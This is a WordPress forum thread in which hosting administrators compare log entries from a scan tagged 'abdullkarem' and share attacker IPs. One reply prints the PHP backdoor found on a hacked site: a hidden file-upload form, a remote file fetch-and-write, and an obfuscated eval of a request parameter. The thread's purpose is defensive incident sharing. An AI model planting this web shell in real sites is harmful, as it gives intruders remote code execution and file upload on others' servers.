Whois Abdull Karem and why are they scanning?

  • Hello and sorry if this is not the right forum for this question.
    I’m working for a wehbosting company hosting a lot of wordpress sites for our customers.
    As of last Saturday our servers getting a lot of scanning traffic (other than the usual DDOS for xmlrpc and brute forces on wp-login.php) scanning for random files. The thing that stands out in this scans is the name Abdull Karem:

    GET /wp-includes/css/guide.php?php4&root&upl&wphp4&abdullkarem&
GET /wp-includes/css/log.php?php4&root&upl&wphp4&abdullkarem&45
GET /wp-includes/wp-class.php?php4&root&upl&wphp4&abdullkarem&4
GET /wp-content/themes/guide.php?php4&root&upl&wphp4&abdullkare
GET /wp-admin/log.php?php4&root&upl&wphp4&abdullkarem&450799&wp

    etc etc
    The scans are coming from dozens of different ip addresses, lots of them from cloud servers like Amazon.
    Sometimes I get more than 200pps for this scan alone per server.
    Has anybody experienced the same in their logs, and what are they looking for?

    Thanks for reading,

    Robert

Viewing 15 replies - 1 through 15 (of 32 total)

  • This may be a outdated WP exploit or someone using a broken script scanning for vulnerable login pages, as long as you have some sort of security precautions in place you shouldn’t worry.

    Very interesting to say the least however.

    Thread Starter EstofexNL

    (@estofexnl)

    Yes, I have never seen this one before.
    Normally it’s just the xmlrpc and wp-login.php.
    I checked the backlogs to see if there are any traces for abdullkarem but couldn’t find any.
    It seems to have started last Saturday.
    Google isn’t very helpful either at the moment (did you mean Abdul Karim?)

    I’ve tried googling the name too, not much is coming up apart from the famous basketball player.

    I don’t think they are gaining or hindering anything scanning for something like this.

    Got the exact same entries here in one of our logs. Just blocked the IP to get rid of’m.
    Interesting indeed!

    I’ve seen quite a bit of that too.

    I’m not a mod_rewrite guru but I’m guessing that it would be pretty easy to write something that redirects to 127.0.0.1 any request that contains that name…

    Same here. It came from IP 54.77.14.200 (ec2-54-77-14-200.eu-west-1.compute.amazonaws.com). Waste of CPU and disk space…

    Hackers utilizing amazon AWS instances, sucks because amazon offers great server instances as well.

    appleisleprospector

    (@appleisleprospector)

    Same here.

    /class-getid3.php?450699=1&php4=1&root=1&upl=1&wphp4=1&abdullkarem=1&wp=1&module=1&php=1&php5=1&wphp5=1

    950+ requests in the space of 30 minutes. It seems like all the instances contain the words ‘abdullkarem’ and ‘module’, and the number 450699.

    My traffic was coming from 91.231.0.120, located in Romania.

    I guess these Hackers look after sometihing like 

    if(isset($_GET[php4])) {echo '<form action="" method="post" enctype="multipart/form-data" name="silence" id="silence">'; echo '<input type="file" name="file"><input name="golden" type="submit" id="golden" value="Done"></form>';
if( $_POST['golden'] == "Done" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '+'; } else { echo '-'; }}} if(isset($_GET[php5])) {$file=$_GET["php5"]; $wpf=strrchr($file, '/'); $wpf=str_replace("/","",$wpf); $content=file_get_contents($file); $wpt = fopen($wpf, "w"); fwrite($wpt, $content); fclose($wpt); } else {echo '<title></title>';}

    in your files. At least that was written in a plugins/index.php-File of one of our hacked customer-sites. Along with a wp-cont.php-File in the same directory with
    <script language='php'> $a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101); eval($a($_REQUEST[sam]));

    and some other nasty things. What we think: With the help of this hacked files, “abdullkarem” uploaded some other files to the system, did what he wanted to do and deleted them again.

    So watch out for any “golden”-Posts and “sam”-Requests.

    @WesterRora

    Interesting! Thanks for sharing.

    Thread Starter EstofexNL

    (@estofexnl)

    @WesterRora

    Thanks a lot! ??
    That is very helpful.

    I saw an event last week from 192.237.187.78 (US) with the same WP attempts with the wphp4&abdullkarem&wp& string. a basic query brought me to a file that was being requested from several other WP pages, /.abdullkarem/3.txt which is likely the file that these requests are trying to inject or reach out to everyone WP pages. Sucuri identified it as a possible htaccess file or index/php attack resulting in redirects to malicious spam and malware domains but not sure if its that serious, a FP, or simply allows the perp unauthorized read/write/delete permission

    Dug around some more and came across a suspicious domain, mohmademad.com, which seems to be either infected with the /.abdullkarem/3.txt file or it is possibly a callout/C2 for the file. Sucuri identified it as a possible htaccess file attack, you can see the results through Sucuri’s SiteChecker, https://sitecheck.sucuri.net/results/muhmademad.com .
    Havent gone in that deep yet but just sending out an FYI to the community since it seems to be circulating.
    -AK

    Thanks for keep everyone posted!

    Hi all,

    Just to be informative. Noticed this today on some sites for file: /wp-admin/css/css.php

    "GET /wp-admin/css/css.php?450699=1&php4=1&root=1&upl=1&wphp4=1&abdullkarem=1&wp=1&module=1&php=1&php5=1&wphp5=1 HTTP/1.0" 404 24284 "-" "-"

    IP originates from Africa (Owner address refers to Isle Mauritius).

    Regards,

    Gerard.

Viewing 15 replies - 1 through 15 (of 32 total)
  • The topic ‘Whois Abdull Karem and why are they scanning?’ is closed to new replies.